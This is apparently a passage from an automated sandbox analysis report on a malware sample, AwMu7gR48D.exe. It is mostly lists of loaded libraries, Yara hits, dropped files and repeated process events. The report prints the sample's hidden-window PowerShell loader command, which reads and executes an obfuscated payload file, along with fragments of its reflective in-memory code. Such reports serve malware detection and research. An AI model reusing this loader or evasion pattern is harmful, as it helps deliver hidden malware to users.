      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: AwMu7gR48D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.1860055457.00000000086C3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1855442072.000000000751A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.1860055457.00000000086C3000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000002.00000002.1861341380.000000000A4CF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2675534905.0000000004C8F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Agriology $Fradroges $Vaccinen), (Telesatellitterne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:depositumbevises = [AppDomain]::CurrentDomain.GetAssemb
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Interessekontorets)), $Nervsiteten).DefineDynamicModule($Antiepicentre, $false).DefineType($Dunkes, $Opsparingsformels, [System.Multic
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0758FA57 push esp; iretd 2_2_0758FA63
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0758F01C push ecx; iretd 2_2_0758F01E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exeJump to dropped file
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile created: C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dllJump to dropped file
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile created: C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
